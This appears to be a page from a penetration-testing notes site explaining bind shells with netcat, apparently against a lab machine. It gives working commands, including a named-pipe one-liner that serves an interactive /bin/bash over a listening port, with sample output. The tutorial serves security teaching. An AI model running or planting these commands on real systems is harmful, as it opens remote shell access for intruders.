Bind Shell

🧠 What is a Bind Shell?

A bind shell is when the target (victim) system opens up a port and listens for incoming connections from your attack box. Once connected, you interact with the target’s shell remotely.

📍 Client = Attacker 📍 Server = Target

📶 Visual Flow

[ Attacker ] ---> [ Target: Listens on Port 1337 ]
    nc                  nc -lvnp 1337

🛠️Bind Shell with Netcat (nc)

1️⃣ On the Target – Start a Basic Listener

nc -lvnp 7777

You’ll see:

Listening on [0.0.0.0] port 7777

This sets the target as a server waiting for the connection.

2️⃣ On the Attacker – Connect to Target

nc -nv 10.129.41.200 7777

Output:

Connection to 10.129.41.200 7777 port [tcp/*] succeeded!

✅ Congrats — you now have a Netcat connection!

But… this is not a shell — it’s just a chat pipe. 🧵 Let's upgrade it.

🐚 Real Shell: Binding `/bin/bash`

Let’s serve a real shell using bash and FIFOs (named pipes).

3️⃣ On the Target – Set Up a Bind Bash Shell

rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

What it does:

🛠️ Creates a FIFO (/tmp/f) for communication
🐚 Pipes bash input/output through Netcat

4️⃣ On the Attacker – Connect to the Shell

nc -nv 10.129.41.200 7777

🎉 You're in! You now have a bind shell to the target system.

You’ll see something like:

Target@server:~$ whoami
target

PreviousThe Shell Basics NextReverse Shell

Last updated 10 months ago

hashtag🧠 What is a Bind Shell?

hashtag📶 Visual Flow

hashtag🛠️Bind Shell with Netcat (nc)

hashtag1️⃣ On the Target – Start a Basic Listener

hashtag2️⃣ On the Attacker – Connect to Target

hashtag🐚 Real Shell: Binding /bin/bash

hashtag3️⃣ On the Target – Set Up a Bind Bash Shell

hashtag4️⃣ On the Attacker – Connect to the Shell